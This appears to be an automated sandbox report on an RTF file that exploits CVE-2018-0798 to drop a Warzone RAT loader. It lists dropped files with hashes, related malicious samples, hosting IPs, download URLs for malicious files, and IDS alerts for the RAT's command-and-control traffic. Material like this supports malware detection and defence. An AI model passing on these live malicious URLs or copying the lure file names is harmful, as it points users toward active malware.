	89085041.exe	Get hash	malicious	Browse	transfer.sh/get/TaUSBQ/Tzdtprkp.log
	11286208.exe	Get hash	malicious	Browse	transfer.sh/get/1KEmBC/Odhxu.jpg
	tXDPyCfwcY.exe	Get hash	malicious	Browse	transfer.sh/get/fvp22f/Aiebe.jpg
	4G5k6vDDlx.exe	Get hash	malicious	Browse	transfer.sh/get/a9xgDe/Gudsp.jpg
	81cofLYh1o.exe	Get hash	malicious	Browse	transfer.sh/get/guc4Cl/Mppvcqd.jpg
	SecuriteInfo.com.Trojan.DownloaderNET.322.17731.exe	Get hash	malicious	Browse	transfer.sh/get/uM4ooB/Xvyspuzxq.png

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
transfer.sh	Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Get hash	malicious	Browse	144.76.136.153
	3228QkgALx.exe	Get hash	malicious	Browse	144.76.136.153
	pvv6dLm4nj.exe	Get hash	malicious	Browse	144.76.136.153
	we05Jms3ro.exe	Get hash	malicious	Browse	144.76.136.153
	file.exe	Get hash	malicious	Browse	144.76.136.153
	Trojan-PSW.Win32.Racealer.lly-e47bfa7b58706ed.exe	Get hash	malicious	Browse	144.76.136.153
	Agency.js	Get hash	malicious	Browse	144.76.136.153
	SNRLdPwLiS.exe	Get hash	malicious	Browse	144.76.136.153
	o3Nqa35sgH.exe	Get hash	malicious	Browse	144.76.136.153
	X505z5Pmvo.exe	Get hash	malicious	Browse	144.76.136.153
	skty7MHpOO.exe	Get hash	malicious	Browse	144.76.136.153
	file.exe	Get hash	malicious	Browse	144.76.136.153
	CaGnpjT99F.exe	Get hash	malicious	Browse	144.76.136.153
	STSWMzs21d.exe	Get hash	malicious	Browse	144.76.136.153
	frJ0A6bu3o.exe	Get hash	malicious	Browse	144.76.136.153
	ag9XblJSIy.exe	Get hash	malicious	Browse	144.76.136.153
	AikBhyUKea.exe	Get hash	malicious	Browse	144.76.136.153
	ChsKaYeP4C.exe	Get hash	malicious	Browse	144.76.136.153
	T1ZtxeY46I.exe	Get hash	malicious	Browse	144.76.136.153
	6aujBGV88v.exe	Get hash	malicious	Browse	144.76.136.153

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	https://form.123formbuilder.com/6265172/form	Get hash	malicious	Browse	136.243.171.217
	ngMpD47v6t.exe	Get hash	malicious	Browse	95.217.49.230
	Hwid Spoofer free.exe	Get hash	malicious	Browse	94.130.190.48
	Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Get hash	malicious	Browse	144.76.136.153
	Ej3vSx3p8Y.exe	Get hash	malicious	Browse	95.217.49.230
	3228QkgALx.exe	Get hash	malicious	Browse	144.76.136.153
	prog.apk	Get hash	malicious	Browse	144.76.58.8
	pvv6dLm4nj.exe	Get hash	malicious	Browse	144.76.136.153
	file.exe	Get hash	malicious	Browse	94.130.190.48
	333rrrr333333Done.vbs	Get hash	malicious	Browse	88.99.90.21
	rtf.exe	Get hash	malicious	Browse	88.99.90.21
	https://depotejarat.ir/voicemail.bat	Get hash	malicious	Browse	95.216.33.194
	we05Jms3ro.exe	Get hash	malicious	Browse	144.76.136.153
	setup.exe	Get hash	malicious	Browse	94.130.190.48
	file.exe	Get hash	malicious	Browse	94.130.190.48
	file.exe	Get hash	malicious	Browse	148.251.234.93
	Trojan-PSW.Win32.Racealer.lly-e47bfa7b58706ed.exe	Get hash	malicious	Browse	148.251.234.93
	XcXzQ9XIby.exe	Get hash	malicious	Browse	95.217.49.230
	Agency.js	Get hash	malicious	Browse	144.76.136.153
	AnyDesk(1).msi	Get hash	malicious	Browse	49.12.130.237
ON-LINE-DATAServerlocation-NetherlandsDrontenNL	UniverseCity.exe	Get hash	malicious	Browse	80.89.228.168
	UniverseCity.exe	Get hash	malicious	Browse	80.89.228.168
	Tx59QrgJCn.exe	Get hash	malicious	Browse	212.86.115.220
	https://github.com/Roberhdjsjshhs/aternos/releases/download/video/nUcN4Rs3h2k9.exe	Get hash	malicious	Browse	45.147.197.24
	http://www.fondationoiiq.org/nouvelles/la-fondation-remet-28-bourses-d-etudes-des-infirmieres-et-infirmiers-de-partout-au-quebec?c_rid=680h0mn9020oAFEEaAOY14204220%7C61500689&utm_campaign=773576&utm_medium=email&utm_source=fondation&utm_content=info&symid=264	Get hash	malicious	Browse	91.228.56.183
	bgmmZtwaPm.exe	Get hash	malicious	Browse	212.86.115.220
	j4KKtbax4Z.exe	Get hash	malicious	Browse	212.86.115.220
	wZEuS96OuM.exe	Get hash	malicious	Browse	212.86.115.220
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.27891.11729.rtf	Get hash	malicious	Browse	212.86.115.220
	noxone.exe	Get hash	malicious	Browse	45.81.225.72
	noxone.zip	Get hash	malicious	Browse	45.81.225.72
	wiIvAl02zT.exe	Get hash	malicious	Browse	185.219.80.143
	HQedq6ne98.exe	Get hash	malicious	Browse	45.137.65.229
	7tT0SIsZeO.exe	Get hash	malicious	Browse	185.219.80.143
	gyVSwSGJzq.exe	Get hash	malicious	Browse	185.219.80.143
	RFQ-PO5510318.doc	Get hash	malicious	Browse	185.219.80.143
	xk99iXc18T.exe	Get hash	malicious	Browse	45.137.65.229
	RFQ-PO5510318.doc	Get hash	malicious	Browse	45.137.65.229
	ezvxrjjxbn.exe	Get hash	malicious	Browse	178.159.38.120
	UniverseCity.exe	Get hash	malicious	Browse	185.206.213.32

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	REGISTER CAT 25 DEC SME.xlsm	Get hash	malicious	Browse	144.76.136.153
	Pago_detalles.xls	Get hash	malicious	Browse	144.76.136.153
	Pago.xls	Get hash	malicious	Browse	144.76.136.153
	makbuzu.xls	Get hash	malicious	Browse	144.76.136.153
	Ref-evert.van.trappen(#Wire confrimation 5342).html	Get hash	malicious	Browse	144.76.136.153
	scan.shtml	Get hash	malicious	Browse	144.76.136.153
	SecuriteInfo.com.Trojan.Agent.FKEV.14871.13075.rtf	Get hash	malicious	Browse	144.76.136.153
	update (1).js	Get hash	malicious	Browse	144.76.136.153
	7_202212147730809788.xls	Get hash	malicious	Browse	144.76.136.153
	7_202212188549740900.xls	Get hash	malicious	Browse	144.76.136.153
	9_202212991100454240.xls	Get hash	malicious	Browse	144.76.136.153
	http://sites.google.com/amricalturs.net/546789/home	Get hash	malicious	Browse	144.76.136.153
	Awb_shipping_BL_doc_48600000000000002422.doc	Get hash	malicious	Browse	144.76.136.153
	Awb_shipping_BL_doc_48600000000000002422.doc	Get hash	malicious	Browse	144.76.136.153
	Wires for Thursday, 22nd.xlsx	Get hash	malicious	Browse	144.76.136.153
	Wires for Thursday, 22nd.xlsx	Get hash	malicious	Browse	144.76.136.153
	Wires for Thursday, 22nd.xlsx	Get hash	malicious	Browse	144.76.136.153
	Wires for Thursday, 22nd.xlsx	Get hash	malicious	Browse	144.76.136.153
	Wires for Thursday, 22nd.xlsx	Get hash	malicious	Browse	144.76.136.153
	https://vanillagcbalanceportal.michel-chaudun.jp/6NEy6h78shEpV9WQ.php?gclid=Cj0KCQiAtICdBhCLARIsALUBFcEyXZMTrgc2RQMClWwv4fvr6MDIx4CQIQdl42AnyndZqe3KvbzKmZ4aAkhhEALw_wcB	Get hash	malicious	Browse	144.76.136.153

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft Vision\05-01-2023_12.32.23

Download File

Process:	C:\Users\user\AppData\Local\Temp\gnwnekc.exe
File Type:	data
Category:	dropped
Size (bytes):	186
Entropy (8bit):	3.4395912526242034
Encrypted:	false
SSDEEP:	3:IlPAd+rPdhOEjlpQlyEXlxlXVl5CSRx6msAnyWdl+Sliol6XlulovDluLAnyWdlM:Iltr1UEZ+lX1ES36WyWn+Skol0uWpyWM
MD5:	A03381F1DDEBBB3D19482C8C3E6F0247
SHA1:	19002AD98F7BDC22A93183CFA8F7BAA689C5EDF0
SHA-256:	3BF565EB0D239FE382125128DC7A6B94E0AF5C41DC54150E8CA33CD0526E746C
SHA-512:	13E2D22687EA456322AF61801DDBDE5AFDD0A65272C637D9E4643810B5B80647DC12C166D697DBED327820461C79A5DDDAB43254EAF28178181CD3EAD4BC57FD
Malicious:	false
Reputation:	low
Preview:	..{.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.g.n.w.n.e.k.c...e.x.e.}...L.e.f.t. .W.i.n.d.o.w.s...{.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.}...L.e.f.t. .W.i.n.d.o.w.s.r.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mwele[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	226038
Entropy (8bit):	7.747961468411059
Encrypted:	false
SSDEEP:	6144:gYa6oaFhr3Uikr9dOK5LbuAiTVqegW6+h:gYywwikr9vLbu/qFE
MD5:	5A474DC9553AA8A2FDB2996CA48C99B8
SHA1:	8C0FF5473B70FC37C4D01510BE4D2B5F2FFB6F1D
SHA-256:	195DDDC856E88FA272A2E4C03542D0DCB591D9A61AF2B6CAD06D3E8E03E5E03C
SHA-512:	9491B89F3366DF777BB11C0EAFC45674F58A8E0854871A0A9F98E8F8B64FCAF8A7D21CB892BBBD65A8A631E04C8D4A6514141B911BF1E1E3F4C36184076022D3
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@..........................@............@..........................................................................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mwele[1].htm

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	169
Entropy (8bit):	4.51833957423091
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPfLRIwcWWGu:q43tISl6kXiMIWSU6XlI5LPtIpfGu
MD5:	84855C13836B389D5EC7CFD4C9266173
SHA1:	1CF3056FF23C4176FD7CA9816A000ED461D6D323
SHA-256:	502083C916AE481CDD413B8D93315300653DF5FB3DCC5770C01991DE19977EAE
SHA-512:	2479112004884D42D4FFE1174DC358C5D1B0FA2B41641D32F2FB67539C4F834D63CFBBF7E98C63B9A64E49B26390C410BB7E50F1AD4A755F32D081367AF05FCB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.18.0</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\570262F8.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows metafile
Category:	dropped
Size (bytes):	162
Entropy (8bit):	3.0822836798610673
Encrypted:	false
SSDEEP:	3:Vmcll/6/lyll6/lollvlgiolog/lLneVOoEXaQNGbV91/l/eXavt/y:MUl/6t2oto90ogtqAozQNGbVPQXC1y
MD5:	A53FF3B2B74B0493CD2DD5351BCB2760
SHA1:	982C525BE61D9769829D2F0A94DB5D61D95BA050
SHA-256:	AC5F55A119B8894F347A6E85328D4A1E7BA350E0D4EA98CE1D3B2F95FAECB5F2
SHA-512:	0E33ADB10427D0E8BEF3E170009361CC569F0EA0CCBA63609BB91CB7830A8EE7B4C65C92FC56DEF2D0AB5E69F6CA955410F1B3761AB34D18CC45BBDCB10F7F65
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......Q................................................................... . .....&...................................&.....MathType..P.....&.....................

C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Download File

Process:	C:\Users\user\AppData\Roaming\word.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	86528
Entropy (8bit):	6.190314838810724
Encrypted:	false
SSDEEP:	1536:qBIoK2O+urs1j8ZPJFqUGQX+/ivwSyXgYmdyAQ0JYI5pcbOMisubmfsr7X:l2O+ursl2GU2/ivwSyXMdyAQ0JY6eOLT
MD5:	5985907FDAB0FFD71DFBB1A96598D2D4
SHA1:	2E57BA991CC6FF13F689776F1A0B60A4BD33D4AF
SHA-256:	E995569ACEEE48B80A102EF262880848A8E50C40B21D7B8772E12B364F16E66D
SHA-512:	F82D42BB6BCCA46EDBF6DD105310A16EFB3AD8B3E99D7ACF17B6FD342C7F7FC0F9E224EA4D35887767728CF9D2C0EFFEEC53AC5FCC109462D800F719CD1D12F5
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c.....................p......w.............@..........................................................................>.......................................=...............................................A..H............................text............................... ..`.rdata...c.......d..................@..@.data........`.......D..............@....00cfg...............N..............@..@.voltbl..............P..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsmF993.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\word.exe
File Type:	data
Category:	dropped
Size (bytes):	233540
Entropy (8bit):	7.268016778900819
Encrypted:	false
SSDEEP:	3072:+xhitGa8rT0jdzvzK4BbepTbbNzch4+yaRlhxVKn8bRn2O+ursl2GU2/ivwSyXM3:+xhUNtbedwHhxVcGEOXg22S/ru
MD5:	291025E5E9C14B70273149DDB9D4A9A2
SHA1:	C255DA5EE17347D94405EB356F9071611DC28628
SHA-256:	E8F2C9EA9C6901C22B74958BA25D4D164B28DB85D25DAC768B357D341E68D163
SHA-512:	8CF48AF0FF89BB9F06373E3059541B542F5F19CBD73E7BA771920627B0ED7C1BB597E4C8D0724DD1DE9BE8D6F3CB5405402F6EB92B7B275677DBE78E189FEA72
Malicious:	false
Preview:	$G......,......................../......ZF......$G..............................................................................O...........................................................................................................................................................G...............P...j..............................................................................................................................."...........m...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\pofhrbobst.v

Download File

Process:	C:\Users\user\AppData\Roaming\word.exe
File Type:	data
Category:	dropped
Size (bytes):	7793
Entropy (8bit):	7.190382932998094
Encrypted:	false
SSDEEP:	192:darcitQvArWiPvPob9JskdJkWipKg0VWtQhEtC8MmLh:uCYrNPvPa9dJkWwqVVTTm9
MD5:	CEB94442D67A69A80D1AC76ADBD09E51
SHA1:	B2E9B54210FEE4DF75FF4BFE82CDE95A4AD3EFE7
SHA-256:	5E1DA6FCFB506B9EBE2594044549B998E0B045C9AA33D36EF81FCD1F856CBD43
SHA-512:	7E61CE81AAA0D629DBAECB6F769D9F52094C78C05E0B9A53F24A584E2EF96AC6BA3C6BD4E1D3EE47441C45B313683BF587293723D58507E7062409FFEE3CE215
Malicious:	false
Preview:	.705m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.\|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.\|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e....aboZf`Z\V.v...`ZYaZCV.v.j^YV.}.lZAU.w.`Z\^.q.iY.T.}.m^.q.[WlT.}....i.W.y.R.}.^.y.W.q.......XW..Mc.....\7!.K.y.a..`.....Z...Jo.......\GB.Gg.u......X.B.Kg.v......Pp..Nd.w.....\...Ke.}.....Y...Ko.p......G8.u....0<..480fP.401Y7a^?X580..D;.g.....A4...Tgn.`...G.X0P0.80..3cg.a.p0..D.`...igen.a..@.b.e.kX.013^3gR7]804p.F8.a.c..q.ad.G<n.`..D2..qb.e...knj..o.00`...)ecXg`Z]^.q.iYXk^OV.}.lZPU.w.`ZE^.q.iY]T.}.mR.R.t.lT.}._\hR.t...R.}.^.y.W.y.R.u......ZR..Jo....\5$.O

C:\Users\user\AppData\Local\Temp\vlmuzzcvjz.yji

Download File

Process:	C:\Users\user\AppData\Roaming\word.exe
File Type:	data
Category:	dropped
Size (bytes):	120991
Entropy (8bit):	7.9780845711064
Encrypted:	false
SSDEEP:	3072:axhitGa8rT0jdzvzK4BbepTbbNzch4+yaRlhxVKP:axhUNtbedwHhxVu
MD5:	AC83329B2E200B89102ECA9E54A2A5C9
SHA1:	EC705A7796918F3306CB1D8A447F85A29EDB063A
SHA-256:	D866A551A42932E42B24F46E42522D48C307C787B1BD313F61D88ECC5B4108BC
SHA-512:	4862097F7086086DCDA131F9CBCE55794AD632B7766023FB8B4245F6A3E0EDE89476CD97C9D30B5A1B93FC5216BDD9F4DACB3C4CB6C35672E538EFA04B987840
Malicious:	false
Preview:	,@.,......~.............v...a...l1'..);.P59..g..Z!'.....AE.]iV......9m.I^.....UH..L....\.r..;.."....n8Q....x.;.Na..1.O_..O.9...1..`..y...J.;.h.v.Q]!.%1..r.......f.[.B..2.O$.h...oGB14..\dD... .7.Y f.z'...#Fp0...DRD..\t.h&........`.........Y..\..E....`..\..W....T.v...a.....{..P.y.9.zg..Z!'.....UAE..;W.S.O.+Y{..yu>o..{.w..y.....2.k..........n'....&./vt..a..1.z.pcO.gnX.jI...B..q.B7.>97.P...G@.....P...V...N[.~?.".S.F".:.0#>.'.8.)R.[ZZ.P.g[.V..f+v..<..HQ...\x..K..k(.....L........Y..\....N".`........q...v...a...l1'..);.P5.....!!'5....NQE.H.W...O.JY{...y.>...{...:/<.....l....8......,... .&./vt.NaZ.1...:.gn.PjI.....H..I.7..N7....G@....S..l......U..6z{.......r.:.0#>.'.8.)F.[.-_.Fg[.V..f+v..<..HQ...\x..Kb.k(.....H........Y..\..E....`..i.....q...v...a...l1'..);.P59..g..Z!'.....tAE.^.W.S.O.JY{...y.>...{.w.......2............n... .&./vt.Na..1.z.pc~.gnX.jI....H...B7..N7....G@.....P...V...o..6\?..T...".:.0#>.'.8.)R.[ZZ.P.g[.V..f+v..<..HQ...\

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Thu Jan 5 19:32:12 2023, length=3744, window=hide
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.575769858349521
Encrypted:	false
SSDEEP:	24:8Z/XTRKJIAZTHCdTBeZhNOHHCdTMDv3qSnu7D:8Z/XT0dTHCfwNwHC1W0D
MD5:	7F3A436225647490437512562FD89F0A
SHA1:	4E049400843ADFF2861D73C22328DD9D1873623C
SHA-256:	4E743ECEBFC2703A134F97419CF21F8674C5D222FD8321CABE0A420FB11CB0FA
SHA-512:	8C3343C33638D26904D1F58755DBE9FA998BD95CC4E77E34BE97FFE7442E5B97E4FBFF9F0F0319955707F3A23D0B1B8DE4E5444175DF3B9B316A52A151AF592A
Malicious:	false
Preview:	L..................F.... ...TjV..3..TjV..3..(..D!..........................#....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....%V.. .SECURI~1.RTF.........hT..hT.....r.....'...............S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.8.-.0.7.9.8...4...1.6.9.5.5...2.4.9.3.2...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf.O.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.8.-.0.7.9.8...4...1.6.9.5.5...2.4.9.3.2...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [misc]
Category:	dropped
Size (bytes):	156
Entropy (8bit):	5.152936419532229
Encrypted:	false
SSDEEP:	3:bDuMJluscbcK+KUQ3NzCmxW9rbcK+KUQ3NzCv:bCVwKhHdsrwKhHdI
MD5:	A48F4ACAE2A0F3A7AC234762D9C915AA
SHA1:	7E4CBC014EDD6824F4495C2500A507D7946E912D
SHA-256:	B69F2B2EF2B349AF7045BC39EF23847E0F9B63BE80EDBEFEF3CEA321DD0DD27E
SHA-512:	A0D499BBBF796D13BE9A7AADF845640D4D94E9BAEF356EC3E36B2CAD7B7AD93E7CEEFFD98D269564F558A3E52A772FB048DF1A158174D671148FDCB8FABC4640
Malicious:	false
Preview:	[folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.LNK=0..[misc]..SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\gnwnekc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	86528
Entropy (8bit):	6.190314838810724
Encrypted:	false
SSDEEP:	1536:qBIoK2O+urs1j8ZPJFqUGQX+/ivwSyXgYmdyAQ0JYI5pcbOMisubmfsr7X:l2O+ursl2GU2/ivwSyXMdyAQ0JY6eOLT
MD5:	5985907FDAB0FFD71DFBB1A96598D2D4
SHA1:	2E57BA991CC6FF13F689776F1A0B60A4BD33D4AF
SHA-256:	E995569ACEEE48B80A102EF262880848A8E50C40B21D7B8772E12B364F16E66D
SHA-512:	F82D42BB6BCCA46EDBF6DD105310A16EFB3AD8B3E99D7ACF17B6FD342C7F7FC0F9E224EA4D35887767728CF9D2C0EFFEEC53AC5FCC109462D800F719CD1D12F5
Malicious:	false
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c.....................p......w.............@..........................................................................>.......................................=...............................................A..H............................text............................... ..`.rdata...c.......d..................@..@.data........`.......D..............@....00cfg...............N..............@..@.voltbl..............P..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\word.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	226038
Entropy (8bit):	7.747961468411059
Encrypted:	false
SSDEEP:	6144:gYa6oaFhr3Uikr9dOK5LbuAiTVqegW6+h:gYywwikr9vLbu/qFE
MD5:	5A474DC9553AA8A2FDB2996CA48C99B8
SHA1:	8C0FF5473B70FC37C4D01510BE4D2B5F2FFB6F1D
SHA-256:	195DDDC856E88FA272A2E4C03542D0DCB591D9A61AF2B6CAD06D3E8E03E5E03C
SHA-512:	9491B89F3366DF777BB11C0EAFC45674F58A8E0854871A0A9F98E8F8B64FCAF8A7D21CB892BBBD65A8A631E04C8D4A6514141B911BF1E1E3F4C36184076022D3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@..........................@............@..........................................................................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	4.073823766335261
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf
File size:	3744
MD5:	43d3572df61172edf51e252c1e83df93
SHA1:	611c9a423db33c48841a6fa0c3cb2d7d70380902
SHA256:	9db4c737fd89168798872f75f407b633bf383afe013d462206e2105bb53dd3ce
SHA512:	4049f7d87eb108e8db06c1d026c0a4ffa0cf85037e97a9d2ddaae332b0dbd539a93d8f0686b8daf883fb3021a564f99e84cc0f651d1bcbc3de19e00701c14889
SSDEEP:	96:t5REERb/j4ubd90L7rD/sR7ITOsZyhX9FlCwtbTy0ymjtjtsoSOx:t5REERfnbd9e7rj87ITOBhX9FcwHAo7x
TLSH:	79712A71894C1CEBD2538A73C53ABD7301A3F15ECADA2791121EF8B40DFF26118A6B45
File Content Preview:	{\rtf1...........{\\atext140629347 \+}.{\386161263\object74874017\objocx31789074\objw3074\objh3965{\\objdata350849{\\nextfile393804247 \bin0000\.887863035389258916}.{\\picttype280324991 \bin0000\.482292886776745731}.e96aee31020000000b000000455155 \bin

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000070h								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
45.137.65.132192.168.2.227410491732036735 01/05/23-12:33:05.086076	TCP	2036735	ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound)	7410	49173	45.137.65.132	192.168.2.22
192.168.2.2245.137.65.1324917374102852327 01/05/23-12:33:05.104273	TCP	2852327	ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse	49173	7410	192.168.2.22	45.137.65.132
192.168.2.2245.137.65.1324917374102852328 01/05/23-12:34:45.168154	TCP	2852328	ETPRO TROJAN Ave Maria/Warzone RAT PingResponse	49173	7410	192.168.2.22	45.137.65.132
192.168.2.2245.137.65.1324917374102036734 01/05/23-12:33:05.104273	TCP	2036734	ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin	49173	7410	192.168.2.22	45.137.65.132
